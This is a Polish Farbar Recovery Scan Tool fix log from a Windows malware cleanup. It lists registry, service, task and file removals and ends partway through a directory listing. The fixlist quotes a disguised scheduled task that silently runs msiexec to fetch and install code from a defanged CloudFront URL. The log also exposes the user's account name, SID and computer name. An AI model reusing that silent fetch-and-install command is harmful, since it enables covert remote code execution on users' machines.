Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 24-05-2017 Uruchomiony przez 007marc (27-05-2017 12:08:38) Run:2 Uruchomiony z D:\Programy Załadowane profile: 007marc (Dostępne profile: 007marc) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKLM\...\Policies\Explorer: [NoResolveSearch] 1 HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [NoResolveSearch] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku GroupPolicy: Ograniczenia <======= UWAGA GroupPolicy\User: Ograniczenia <======= UWAGA GroupPolicyScripts: Ograniczenia <======= UWAGA HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKU\S-1-5-21-1280168119-2054726452-3514120849-1001 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = S2 Bonjour Service; Brak ImagePath S2 Origin Web Helper Service; Brak ImagePath S3 Sense; "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" [X] S2 SkypeUpdate; Brak ImagePath U3 uxldipod; C:\Users\007marc\AppData\Local\Temp\uxldipod.sys [56584 2017-05-23] (GMER) [Brak podpisu cyfrowego] <==== UWAGA U3 aswbdisk; Brak ImagePath U4 DiagTrack; Brak ImagePath U4 TimeBroker; Brak ImagePath Task: {A15E2711-C513-4908-B7D5-948AEBC71353} - System32\Tasks\Microsoft\Windows\DeviceSettings\Phisokanadaing => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=SamsungXSSDX850XEVOX1TB_S2RFNX0H605538A&d=20170512 /q <==== UWAGA HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_A27FE493B52116EED8A5019763B2C6B9" HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "3O5H6RIBDJDQQYO" HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "D7HWVT7HVLJZMMT" C:\Users\007marc\AppData\Roaming\Songbird2 C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft Debugger.lnk C:\Users\007marc\Desktop\BD-RE.lnk C:\Users\007marc\Desktop\Ghost Files.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Uninstall.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Minecraft\Minecraft.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\= INNE =\Skype.lnk C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\User\AppData\Local\Google ] DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google CMD: set CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Pawe�\AppData\Local CMD: dir /a C:\Users\Pawe�\AppData\LocalLow CMD: dir /a C:\Users\Pawe�\AppData\Roaming Hosts: EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLowDiskSpaceChecks => Wartość nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoResolveSearch => Wartość nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\LinkResolveIgnoreLinkInfo => Wartość nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoInternetOpenWith => Wartość nie znaleziono. HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLowDiskSpaceChecks => Wartość nie znaleziono. HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoResolveSearch => Wartość nie znaleziono. HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\LinkResolveIgnoreLinkInfo => Wartość nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => klucz nie znaleziono. HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => klucz nie znaleziono. "C:\WINDOWS\system32\GroupPolicy\Machine" => nie znaleziono. "C:\WINDOWS\system32\GroupPolicy\User" => nie znaleziono. "C:\WINDOWS\system32\GroupPolicy\Machine" => nie znaleziono. HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Policies\Microsoft\Internet Explorer => klucz nie znaleziono. HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Local Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość nie znaleziono. Bonjour Service => serwis nie znaleziono. Origin Web Helper Service => serwis nie znaleziono. Sense => serwis nie znaleziono. SkypeUpdate => serwis nie znaleziono. uxldipod => serwis nie znaleziono. aswbdisk => serwis nie znaleziono. DiagTrack => serwis nie znaleziono. TimeBroker => serwis nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A15E2711-C513-4908-B7D5-948AEBC71353} => klucz nie znaleziono. C:\WINDOWS\System32\Tasks\Microsoft\Windows\DeviceSettings\Phisokanadaing => nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Phisokanadaing => klucz nie znaleziono. HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\GoogleChromeAutoLaunch_A27FE493B52116EED8A5019763B2C6B9 => Wartość nie znaleziono. HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_A27FE493B52116EED8A5019763B2C6B9 => Wartość nie znaleziono. HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\3O5H6RIBDJDQQYO => Wartość nie znaleziono. HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\3O5H6RIBDJDQQYO => Wartość nie znaleziono. HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\D7HWVT7HVLJZMMT => Wartość nie znaleziono. HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\D7HWVT7HVLJZMMT => Wartość nie znaleziono. "C:\Users\007marc\AppData\Roaming\Songbird2" => nie znaleziono. "C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft Debugger.lnk" => nie znaleziono. "C:\Users\007marc\Desktop\BD-RE.lnk" => nie znaleziono. "C:\Users\007marc\Desktop\Ghost Files.lnk" => nie znaleziono. "C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft.lnk" => nie znaleziono. "C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Uninstall.lnk" => nie znaleziono. "C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Minecraft\Minecraft.lnk" => nie znaleziono. "C:\Users\007marc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\= INNE =\Skype.lnk" => nie znaleziono. "C:\Program Files (x86)\Google" => nie znaleziono. "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome" => nie znaleziono. "C:\Users\User\AppData\Local\Google ]" => nie znaleziono. HKCU\Software\Google => klucz nie znaleziono. HKLM\SOFTWARE\Google => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\Google => klucz nie znaleziono. ========= set ========= ALLUSERSPROFILE=C:\ProgramData APPDATA=C:\Users\007marc\AppData\Roaming BREAKPAD_DUMP_LOCATION=C:\Users\Public\Documents\Google\Chrome CHROME_CRASHPAD_SERVER_URL=https://client2.google.com/cr/reports CommonProgramFiles=C:\Program Files\Common Files CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files CommonProgramW6432=C:\Program Files\Common Files COMPUTERNAME=XYMOX ComSpec=C:\WINDOWS\system32\cmd.exe FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer FPS_BROWSER_USER_PROFILE_STRING=Default GPU_MAX_ALLOC_PERCENT=80 HOMEDRIVE=C: HOMEPATH=\Users\007marc LOCALAPPDATA=C:\Users\007marc\AppData\Local LOGONSERVER=\\XYMOX NUMBER_OF_PROCESSORS=4 OS=Windows_NT Path=c:\programdata\oracle\java\javapath;c:\windows\system32;c:\windows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\windows\system32;c:\windows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\program files (x86)\skype\phone\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Skype\Phone\;C:\Users\007marc\AppData\Local\Microsoft\WindowsApps; PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC PROCESSOR_ARCHITECTURE=AMD64 PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 60 Stepping 3, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=3c03 ProgramData=C:\ProgramData ProgramFiles=C:\Program Files ProgramFiles(x86)=C:\Program Files (x86) ProgramW6432=C:\Program Files PROMPT=$P$G PSModulePath=C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ PUBLIC=C:\Users\Public SESSIONNAME=Console SystemDrive=C: SystemRoot=C:\WINDOWS TEMP=C:\Users\007marc\AppData\Local\Temp TMP=C:\Users\007marc\AppData\Local\Temp USERDOMAIN=XYMOX USERDOMAIN_ROAMINGPROFILE=XYMOX USERNAME=007marc USERPROFILE=C:\Users\007marc windir=C:\WINDOWS ========= Koniec CMD: ========= ========= dir /a "C:\Program Files" ========= Volume in drive C has no label. Volume Serial Number is 4881-B2C7 Directory of C:\Program Files 27.05.2017 07:29